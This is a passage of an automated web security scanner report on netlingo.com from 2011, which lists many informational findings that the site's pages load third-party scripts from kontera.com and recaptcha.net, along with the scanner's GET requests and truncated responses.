<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1146. http://www.netlingo.com/contact/contact-us.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/contact/contact-us.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /contact/contact-us.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1147. http://www.netlingo.com/contact/faq.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/contact/faq.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /contact/faq.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 50982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1148. http://www.netlingo.com/contact/linktonetlingo.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/contact/linktonetlingo.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /contact/linktonetlingo.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1149. http://www.netlingo.com/country.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/country.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /country.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 36558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1150. http://www.netlingo.com/hello/welcome.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/hello/welcome.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /hello/welcome.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1151. http://www.netlingo.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:47:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 45979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1152. http://www.netlingo.com/iphone/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/iphone/

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /iphone/ HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32376

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1153. http://www.netlingo.com/iphone/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/iphone/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /iphone/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32385

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1154. http://www.netlingo.com/legal/copyright.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/legal/copyright.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /legal/copyright.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 55189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1155. http://www.netlingo.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/login.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /login.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=p2kggg0b9m3bnq9c57hhsvlcl0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 33956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1156. http://www.netlingo.com/more/adsizes.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/more/adsizes.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /more/adsizes.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 29473

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1157. http://www.netlingo.com/press/about-netlingo.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/press/about-netlingo.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /press/about-netlingo.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 74633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1158. http://www.netlingo.com/press/all-press-clippings.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/press/all-press-clippings.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /press/all-press-clippings.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:55:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 82341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1159. http://www.netlingo.com/press/awards.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/press/awards.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /press/awards.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1160. http://www.netlingo.com/press/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/press/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /press/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:55:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33830

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1161. http://www.netlingo.com/press/media.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/press/media.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /press/media.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:55:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 69711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1162. http://www.netlingo.com/press/meet-erin.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/press/meet-erin.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /press/meet-erin.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:55:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1163. http://www.netlingo.com/press/print.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/press/print.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /press/print.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:55:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 101161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1164. http://www.netlingo.com/press/teen-text-talk.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/press/teen-text-talk.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /press/teen-text-talk.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1165. http://www.netlingo.com/press/web.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/press/web.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /press/web.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:55:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 80087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1166. http://www.netlingo.com/register-premium.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/register-premium.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /register-premium.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 56600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1167. http://www.netlingo.com/register.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/register.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /register.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=sb796kqmjk5b811eau65ljq195; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 46577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1168. http://www.netlingo.com/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/search.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /search.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1169. http://www.netlingo.com/shop/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/shop/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /shop/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1170. http://www.netlingo.com/shop/netlingo-the-dictionary.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/shop/netlingo-the-dictionary.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /shop/netlingo-the-dictionary.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 36542

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1171. http://www.netlingo.com/shop/netlingo-the-list.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/shop/netlingo-the-list.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /shop/netlingo-the-list.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1172. http://www.netlingo.com/shop/online-store.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/shop/online-store.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /shop/online-store.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 43507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1173. http://www.netlingo.com/shop/shopping-cart.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/shop/shopping-cart.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /shop/shopping-cart.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1174. http://www.netlingo.com/smileys.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/smileys.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /smileys.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:44:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 43271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1175. http://www.netlingo.com/subscribe.php previous next

